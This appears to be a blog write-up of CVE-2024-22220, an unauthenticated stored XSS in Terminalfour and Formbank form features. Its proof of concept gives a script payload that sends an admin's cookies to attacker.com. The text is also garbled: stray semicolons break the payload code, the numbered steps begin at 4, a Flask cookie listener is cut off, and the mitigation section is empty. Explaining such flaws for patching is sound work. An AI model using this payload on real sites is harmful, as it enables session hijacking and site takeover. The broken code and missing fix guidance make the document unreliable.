CVE-2024-22220 - Breaking Down the Unauthenticated Stored XSS in Terminalfour and Formbank

---

Introduction

CVE-2024-22220 is a critical vulnerability discovered in *Terminalfour* (versions 7.4 through 7.4.0004 QP3, 8 through 8.3.19) and *Formbank* (through 2.1.10-FINAL). This flaw allows unauthenticated attackers to inject malicious JavaScript via the Form Builder and Form Preview features. The stored script executes in the context of any user – including admins – leading to the risk of admin session hijacking and full website compromise.

This post will explain how the attack works, provide proof-of-concept code, give you references, and explain best practices to avoid such flaws.

What is Stored XSS?

Stored Cross-Site Scripting (XSS) occurs when untrusted user input is saved by the server (in this case, through form submissions or builders) and later rendered in a web page without proper sanitization. Anyone who loads the page can be hit by the malicious payload.

Unlike Reflected XSS, *Stored XSS* does not require the attacker to directly trick the victim into clicking a snare link—they just need to get their code stored and wait.

Vulnerable Products

- Terminalfour: 7.4 through 7.4.0004 QP3, 8 through 8.3.19 (https://www.terminalfour.com)
- Formbank: through 2.1.10-FINAL (https://github.com/terminalfour/FormBank)

How Does CVE-2024-22220 Work?

The bug exists because the applications don’t properly sanitize user-supplied data in the Form Builder and Form Preview features. An attacker can submit a form field or preview with malicious JavaScript. When an admin later visits the page to manage forms, the script executes in their browser.

No login is needed — anyone can submit the payload.

When an admin previews or edits the form, the malicious code runs in their browser.

4. The script can steal the admin’s session cookie or perform actions as the admin, leading to a full account takeover.

Proof of Concept: Exploit Code

Let’s suppose the Form Builder asks users for their name.

The attacker submits

<script>
    fetch('https://attacker.com/cookie?c='; + encodeURIComponent(document.cookie))
</script>

When an admin loads the form submission or previews it, the HTML renders as

<tr>
  <td>Name</td>
  <td>
    <script>
      fetch('https://attacker.com/cookie?c='; + encodeURIComponent(document.cookie))
    </script>
  </td>
</tr>

The browser runs the script immediately, sending the admin’s session cookie to the attacker’s server.

app = Flask(__name__)

@app.route('/cookie')

Original References

- Terminalfour Security Notices
- FormBank on GitHub
- NIST NVD: CVE-2024-22220 entry
- OWASP XSS Guide


## Mitigation / Fix

Closing Thoughts

CVE-2024-22220 is a textbook case of why escaping and sanitization matter so much in web apps. If your app uses Terminalfour or Formbank in the affected versions, patch urgently. If you build forms on the web—add that extra layer of suspicion and always sanitize everything.

Stay safe. If you think your organization may be affected, review your form fields and check your software versions as soon as possible.


Want to dive deeper? Check out the official advisories and code your own XSS test cases. Constant vigilance pays off.

Timeline

Published on: 02/21/2024 16:15:50 UTC
Last modified on: 11/21/2024 17:15:11 UTC